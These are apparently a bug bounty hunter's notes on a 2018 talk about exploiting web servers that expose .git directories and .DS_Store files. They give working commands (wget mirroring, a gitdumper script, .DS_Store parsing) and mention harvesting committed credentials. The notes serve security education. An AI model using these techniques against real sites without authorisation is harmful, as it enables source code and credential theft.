Hi, these are the notes I took while watching the “Small Files And Big Bounties, Exploiting Sensitive Files” talk given by Sebastian Neef and Tim Philipp Schäfers on LevelUp 0x02 / 2018.
Happens if the deployment process is cd /var/www/html && git pull
Then the /.git/ folder might be accessible!
Why is it bad?
If directory listing is enabled
An attacker can download the whole repository with wget
Demo
wget --mirror --include-directories=/.git http://domain.tld/.git/
git status # Returns that the files were deleted because folders are empty
git checkout -- . # To restore the files & download the directory
git log # See what other commits are there
If directory listing is disabled
Getting the whole directory is hard
But two files are always accessible (if there’s a master branch):
.git/HEAD
.git/refs/heads/master
They can be used to obtain one object hash
With it you can download the object file & get new object hashes
Repeat until nothing new is found!
You end up with parts or the full repository on your hard disk
./gitdumper.sh http://demo.local/.git/ /output-directory/
git status # Returns that the files were deleted because folders are empty
git checkout -- . # To restore the files & download the directory
git log # See what other commits are there
Consequences
Source code disclosure
Get the source & find other vulns
Find committed credentials & escalate privileges
! Only look further if it is allowed by the BBP’s rules !
In some cases .git/config contains HTTP-BasicAuth credentials
Instant access to company’s repositories (GitLab / GitHub …)
Access to the CI (e.g. GitLabCI): Build scripts & auto-deployment may lead to server pwnage
This filename starts with a dot, so the Finder won’t show it by default
This is bad for you if you share a ZIP file or other files using a USB stick. Other people might get information about what files are stored in the directory as well even if you don’t copy the whole directory.
Problem 2
If you use a Mac for development & you use a tool like scp/rsync/ftp to transfer files from your local development environment to a server
For example if the deployment process is scp / rsync / ftp / ./code/ server:/var/www/html/
And if you don’t exclude .DS_Store files from the file transfer
Then …
All files, including .DS_Store, are transfered & exposed
The .DS_Store in each directory contains the list of files present in the remote directory. This is why you get a conflict notification if you try transfering a file that’s already existing on the server
=> You can know if a directory exists on the server without bruteforcing & even if directory listing is disabled
You can also iterate the process (recursively get the .DS-Store file of each subdirectory) to obtain the whole remote file structure
$ file samples/.DS_Store.ctf
samples/.DS_Store.ctf: Apple Desktop Services Store
$ hexdump -C samples/.DS_Store.ctf
# Output: A lot of binary data, you can't read much
$ python main.py samples/.DS_Store.ctf
# Output: File names recovered
Consequences
Directory listing ‘bypass’
Disclosure of (probably) accessible files on the server (without using bruteforce or having directory listing enabled)
Backup files
Database files
Temporary files
Key files (e.g. private keys from SSL enabled Web servers)